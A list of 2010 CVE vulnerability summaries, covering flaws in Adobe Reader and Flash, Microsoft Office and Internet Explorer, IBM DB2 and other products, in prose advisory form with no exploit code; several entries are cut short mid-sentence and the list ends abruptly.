[CVE-2010-3734] The Install component in IBM DB2 UDB 9.5 before FP6a on Linux, UNIX, and Windows enforces an unintended limit on password length, which makes it easier for attackers to obtain access via a brute-force attack. [CVE-2010-3732] The DRDA Services component in IBM DB2 UDB 9.5 before FP6a allows remote authenticated users to cause a denial of service (database server ABEND) by using the client CLI on Linux, UNIX, or Windows for executing a prepared statement with a large number of parameter markers. [CVE-2010-3658] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3632. [CVE-2010-3657] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3656. [CVE-2010-3656] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3657. [CVE-2010-3654] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or libauthplay.so.0.0.0) in Adobe Reader and Acrobat 9.x through 9.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted SWF content, as exploited in the wild in October 2010. [CVE-2010-3652] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3650. [CVE-2010-3650] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, and CVE-2010-3652. [CVE-2010-3649] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3648] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3647] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3646] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3645] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3644] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3643] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3642, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3642] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3641, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3641] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3640, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3640] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unknown vectors, a different vulnerability than CVE-2010-3641, CVE-2010-3642, CVE-2010-3643, CVE-2010-3644, CVE-2010-3645, CVE-2010-3646, CVE-2010-3647, CVE-2010-3648, CVE-2010-3649, CVE-2010-3650, and CVE-2010-3652. [CVE-2010-3639] Unspecified vulnerability in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3637] An unspecified ActiveX control in Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 (Flash10h.ocx) on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted FLV video. [CVE-2010-3636] Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris, and 10.1.95.1 on Android, does not properly handle unspecified encodings during the parsing of a cross-domain policy file, which allows remote web servers to bypass intended access restrictions via unknown vectors. [CVE-2010-3632] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, and CVE-2010-3658. [CVE-2010-3630] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors. [CVE-2010-3629] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3620. [CVE-2010-3628] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3627] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via unknown vectors. [CVE-2010-3626] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-2889. [CVE-2010-3625] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code via unspecified vectors, related to a "prefix protocol handler vulnerability." [CVE-2010-3622] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3621, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3621] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3619, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3620] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted image, a different vulnerability than CVE-2010-3629. [CVE-2010-3619] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-2890, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-3535] Unspecified vulnerability in the Directory Server Enterprise Edition component in Oracle Sun Products Suite 6.0, 6.1, 6.2, and 6.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Identity Synchronization for Windows. [CVE-2010-3499] F-Secure Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that "the inability to catch these files are caused by lacking functionality rather than programming errors." [CVE-2010-3498] AVG Anti-Virus does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3497] Symantec Norton AntiVirus 2011 does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. NOTE: the researcher indicates that a vendor response was received, stating that this issue "falls into the work of our Firewall and not our AV (per our methodology of layers of defense)." [CVE-2010-3496] McAfee VirusScan Enterprise 8.5i and 8.7i does not properly interact with the processing of hcp:// URLs by the Microsoft Help and Support Center, which makes it easier for remote attackers to execute arbitrary code via malware that is correctly detected by this product, but with a detection approach that occurs too late to stop the code execution. [CVE-2010-3487] Directory traversal vulnerability in YelloSoft Pinky 1.0 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3460] Directory traversal vulnerability in the HTTP interface in AXIGEN Mail Server 7.4.1 for Windows allows remote attackers to read arbitrary files via a %5C (encoded backslash) in the URL. [CVE-2010-3454] Multiple off-by-one errors in the WW8DopTypography::ReadFromMem function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via crafted typography information in a Microsoft Word .DOC file that triggers an out-of-bounds write. [CVE-2010-3453] The WW8ListManager::WW8ListManager function in oowriter in OpenOffice.org (OOo) 2.x and 3.x before 3.3 does not properly handle an unspecified number of list levels in user-defined list styles in WW8 data in a Microsoft Word document, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted .DOC file that triggers an out-of-bounds write. [CVE-2010-3348] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3342. [CVE-2010-3346] Microsoft Internet Explorer 6, 7, and 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3345] Microsoft Internet Explorer 8 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Element Memory Corruption Vulnerability." [CVE-2010-3343] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3342] Microsoft Internet Explorer 6, 7, and 8 does not prevent rendering of cached content as HTML, which allows remote attackers to access content from a different (1) domain or (2) zone via unspecified script code, aka "Cross-Domain Information Disclosure Vulnerability," a different vulnerability than CVE-2010-3348. [CVE-2010-3340] Microsoft Internet Explorer 6 and 7 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "HTML Object Memory Corruption Vulnerability." [CVE-2010-3337] Untrusted search path vulnerability in Microsoft Office 2007 SP2 and 2010 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Insecure Library Loading Vulnerability." NOTE: this might overlap CVE-2010-3141 and CVE-2010-3142. [CVE-2010-3336] Microsoft Office XP SP3, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "MSO Large SPID Read AV Vulnerability." [CVE-2010-3335] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via a crafted Office document that triggers memory corruption, aka "Drawing Exception Handling Vulnerability." [CVE-2010-3334] Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code via an Office document containing an Office Art Drawing record with crafted msofbtSp records and unspecified flags, which triggers memory corruption, aka "Office Art Drawing Records Vulnerability." [CVE-2010-3333] Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability." [CVE-2010-3332] Microsoft .NET Framework 1.1 SP1, 2.0 SP1 and SP2, 3.5, 3.5 SP1, 3.5.1, and 4.0, as used for ASP.NET in Microsoft Internet Information Services (IIS), provides detailed error codes during decryption attempts, which allows remote attackers to decrypt and modify encrypted View State (aka __VIEWSTATE) form data, and possibly forge cookies or read application files, via a padding oracle attack, aka "ASP.NET Padding Oracle Vulnerability." [CVE-2010-3331] Microsoft Internet Explorer 6 through 8 does not properly handle objects in memory in certain circumstances involving use of Microsoft Word to read Word documents, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3330] Microsoft Internet Explorer 6 through 8 does not properly restrict script access to content from a different (1) domain or (2) zone, which allows remote attackers to obtain sensitive information via a crafted web site, aka "Cross-Domain Information Disclosure Vulnerability." [CVE-2010-3329] mshtmled.dll in Microsoft Internet Explorer 7 and 8 allows remote attackers to execute arbitrary code via a crafted Microsoft Office document that causes the HtmlDlgHelper class destructor to access uninitialized memory, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3328] Use-after-free vulnerability in the CAttrArray::PrivateFind function in mshtml.dll in Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code by setting an unspecified property of a stylesheet object, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3327] The implementation of HTML content creation in Microsoft Internet Explorer 6 through 8 does not remove the Anchor element during pasting and editing, which might allow remote attackers to obtain sensitive deleted information by visiting a web page, aka "Anchor Element Information Disclosure Vulnerability." [CVE-2010-3326] Microsoft Internet Explorer 6 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, leading to memory corruption, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2010-3325] Microsoft Internet Explorer 6 through 8 does not properly handle unspecified special characters in Cascading Style Sheets (CSS) documents, which allows remote attackers to obtain sensitive information from a different (1) domain or (2) zone via a crafted web site, aka "CSS Special Character Information Disclosure Vulnerability." [CVE-2010-3268] The GetStringAMSHandler function in prgxhndl.dll in hndlrsvc.exe in the Intel Alert Handler service (aka Symantec Intel Handler service) in Intel Alert Management System (AMS), as used in Symantec Antivirus Corporate Edition 10.1.4.4010 on Windows 2000 SP4 and Symantec Endpoint Protection before 11.x, does not properly validate the CommandLine field of an AMS request, which allows remote attackers to cause a denial of service (application crash) via a crafted request. [CVE-2010-3242] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Ghost Record Type Parsing Vulnerability." [CVE-2010-3241] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out-of-Bounds Memory Write in Parsing Vulnerability." [CVE-2010-3240] Microsoft Excel 2002 SP3 and 2007 SP2 [CVE-2010-3239] Microsoft Excel 2002 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Extra Out of Boundary Record Parsing Vulnerability." [CVE-2010-3238] Microsoft Excel 2002 SP3 and 2003 SP3, and Office 2004 for Mac, does not properly validate binary file-format information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Negative Future Function Vulnerability." [CVE-2010-3237] Microsoft Excel 2002 SP3 and Office 2004 for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Merge Cell Record Pointer Vulnerability." [CVE-2010-3236] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Out Of Bounds Array Vulnerability." [CVE-2010-3235] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Biff Record Vulnerability." [CVE-2010-3234] Microsoft Excel 2002 SP3 does not properly validate formula information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Formula Substream Memory Corruption Vulnerability." [CVE-2010-3233] Microsoft Excel 2002 SP3 and 2003 SP3 does not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted .wk3 (aka Lotus 1-2-3 workbook) file, aka "Lotus 1-2-3 Workbook Parsing Vulnerability." [CVE-2010-3232] Microsoft Excel 2003 SP3 and 2007 SP2 [CVE-2010-3231] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac do not properly validate record information, which allows remote attackers to execute arbitrary code via a crafted Excel document, aka "Excel Record Parsing Memory Corruption Vulnerability." [CVE-2010-3230] Integer overflow in Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code via an Excel document with crafted record information, aka "Excel Record Parsing Integer Overflow Vulnerability." [CVE-2010-3228] The JIT compiler in Microsoft .NET Framework 4.0 on 64-bit platforms does not properly perform optimizations, which allows remote attackers to execute arbitrary code via a crafted .NET application that triggers memory corruption, aka ".NET Framework x64 JIT Compiler Vulnerability." [CVE-2010-3221] Microsoft Word 2002 SP3 and 2003 SP3, Office 2004 for Mac, and Word Viewer do not properly handle a malformed record during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3220] Unspecified vulnerability in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Parsing Vulnerability." [CVE-2010-3219] Array index vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Parsing Vulnerability." [CVE-2010-3218] Heap-based buffer overflow in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via malformed records in a Word document, aka "Word Heap Overflow Vulnerability." [CVE-2010-3217] Double free vulnerability in Microsoft Word 2002 SP3 allows remote attackers to execute arbitrary code via a Word document with crafted List Format Override (LFO) records, aka "Word Pointer Vulnerability." [CVE-2010-3216] Microsoft Word 2002 SP3 and Office 2004 for Mac allow remote attackers to execute arbitrary code via a crafted Word document containing bookmarks that trigger use of an invalid pointer and memory corruption, aka "Word Bookmarks Vulnerability." [CVE-2010-3215] Microsoft Word 2002 SP3 and Office 2004 for Mac do not properly handle unspecified return values during parsing of a Word document, which allows remote attackers to execute arbitrary code via a crafted document that triggers memory corruption, aka "Word Return Value Vulnerability." [CVE-2010-3214] Stack-based buffer overflow in Microsoft Word 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2010-3213] Cross-site request forgery (CSRF) vulnerability in Microsoft Outlook Web Access (owa/ev.owa) 2007 through SP2 allows remote attackers to hijack the authentication of e-mail users for requests that perform Outlook requests, as demonstrated by setting the auto-forward rule. [CVE-2010-3200] MSO.dll in Microsoft Word 2003 SP3 11.8326.11.8324 allows remote attackers to cause a denial of service (NULL pointer dereference and multiple-instance application crash) via a crafted buffer in a Word document, as demonstrated by word_crash_11.8326.8324_poc.doc. [CVE-2010-3195] Unspecified vulnerability in IBM DB2 9.1 before FP9, 9.5 before FP6, and 9.7 before FP2 on Windows Server 2008 allows attackers to cause a denial of service (trap) via vectors involving "special group and user enumeration." [CVE-2010-3190] Untrusted search path vulnerability in the Microsoft Foundation Class (MFC) Library in Microsoft Visual Studio .NET 2003 SP1 [CVE-2010-3181] Untrusted search path vulnerability in Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory. [CVE-2010-3157] Untrusted search path vulnerability in XacRett before 50 allows attackers to execute arbitrary code via a Trojan horse executable file, related to the explorer.exe filename and use of Windows Explorer. [CVE-2010-3148] Untrusted search path vulnerability in Microsoft Visio 2003 SP3 allows local users to gain privileges via a Trojan horse mfc71enu.dll file in the current working directory, as demonstrated by a directory that contains a .vsd, .vdx, .vst, or .vtx file, aka "Microsoft Visio Insecure Library Loading Vulnerability." [CVE-2010-3146] Multiple untrusted search path vulnerabilities in Microsoft Groove 2007 SP2 allow local users to gain privileges via a Trojan horse (1) mso.dll or (2) GroovePerfmon.dll file in the current working directory, as demonstrated by a directory that contains a Groove vCard (.vcg) or Groove Tool Archive (.gta) file, aka "Microsoft Groove Insecure Library Loading Vulnerability." [CVE-2010-3142] Untrusted search path vulnerability in Microsoft Office PowerPoint 2007 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse rpawinet.dll that is located in the same folder as a .odp, .pothtml, .potm, .potx, .ppa, .ppam, .pps, .ppt, .ppthtml, .pptm, .pptxml, .pwz, .sldm, .sldx, and .thmx file. [CVE-2010-3141] Untrusted search path vulnerability in Microsoft PowerPoint 2010 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse pptimpconv.dll that is located in the same folder as a .odp, .pot, .potm, .potx, .ppa, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .pwz, .sldm, or .sldx file. [CVE-2010-3131] Untrusted search path vulnerability in Mozilla Firefox before 3.5.12 and 3.6.x before 3.6.9, Thunderbird before 3.0.7 and 3.1.x before 3.1.3, and SeaMonkey before 2.0.7 on Windows XP allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll that is located in the same folder as a .htm, .html, .jtx, .mfp, or .eml file. [CVE-2010-3111] Google Chrome before 6.0.472.53 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors, a different vulnerability than CVE-2010-2897. [CVE-2010-3101] Directory traversal vulnerability in FTPx Corp FTP Explorer 10.5.19.1 for Windows, and probably earlier versions, allows remote FTP servers to write arbitrary files via a "..\" (dot dot backslash) in a filename. [CVE-2010-3069] Stack-based buffer overflow in the (1) sid_parse and (2) dom_sid_parse functions in Samba before 3.5.5 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted Windows Security ID (SID) on a file share. [CVE-2010-3008] Unspecified vulnerability in HP Data Protector Express, and Data Protector Express Single Server Edition (SSE), 3.x before build 56936 and 4.x before build 56906 on Windows allows local users to gain privileges or cause a denial of service via unknown vectors, a different vulnerability than CVE-2010-3007. [CVE-2010-3005] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows local users to gain privileges via unknown vectors. [CVE-2010-3004] Unspecified vulnerability in HP Operations Agent 7.36 and 8.6 on Windows allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2010-3001] Unspecified vulnerability in an ActiveX control in the Internet Explorer (IE) plugin in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows has unknown impact and attack vectors related to "multiple browser windows." [CVE-2010-3000] Multiple integer overflows in the ParseKnownType function in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1.4 on Windows allow remote attackers to execute arbitrary code via crafted (1) HX_FLV_META_AMF_TYPE_MIXEDARRAY or (2) HX_FLV_META_AMF_TYPE_ARRAY data in an FLV file. [CVE-2010-2996] Array index error in RealNetworks RealPlayer 11.0 through 11.1 on Windows allows remote attackers to execute arbitrary code via a malformed header in a RealMedia .IVR file. [CVE-2010-2991] The IICAClient interface in the ICAClient library in the ICA Client ActiveX Object (aka ICO) component in Citrix Online Plug-in for Windows for XenApp & XenDesktop before 12.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HTML document that triggers the reading of a .ICA file. [CVE-2010-2990] Citrix Online Plug-in for Windows for XenApp & XenDesktop before 11.2, Citrix Online Plug-in for Mac for XenApp & XenDesktop before 11.0, Citrix ICA Client for Linux before 11.100, Citrix ICA Client for Solaris before 8.63, and Citrix Receiver for Windows Mobile before 11.5 allow remote attackers to execute arbitrary code via (1) a crafted HTML document, (2) a crafted .ICA file, or (3) a crafted type field in an ICA graphics packet, related to a "heap offset overflow" issue. [CVE-2010-2897] Google Chrome before 5.0.375.125 does not properly mitigate an unspecified flaw in the Windows kernel, which has unknown impact and attack vectors. [CVE-2010-2890] Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2010-3619, CVE-2010-3621, CVE-2010-3622, CVE-2010-3628, CVE-2010-3632, and CVE-2010-3658. [CVE-2010-2889] Unspecified vulnerability in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows attackers to execute arbitrary code via a crafted font, a different vulnerability than CVE-2010-3626. [CVE-2010-2888] Multiple unspecified vulnerabilities in an ActiveX control in Adobe Reader and Acrobat 8.x before 8.2.5 and 9.x before 9.4 on Windows allow attackers to execute arbitrary code via unknown vectors. [CVE-2010-2884] Adobe Flash Player 10.1.82.76 and earlier on Windows, Mac OS X, Linux, and Solaris and 10.1.92.10 on Android [CVE-2010-2883] Stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4, and 8.x before 8.2.5 on Windows and Mac OS X, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a PDF document with a long field in a Smart INdependent Glyphlets (SING) table in a TTF font, as exploited in the wild in September 2010. NOTE: some of these details are obtained from third party information. [CVE-2010-2750] Array index error in Microsoft Word 2002 SP3 and Office 2004 for Mac allows remote attackers to execute arbitrary code via a crafted Word document that triggers memory corruption, aka "Word Index Vulnerability." [CVE-2010-2748] Microsoft 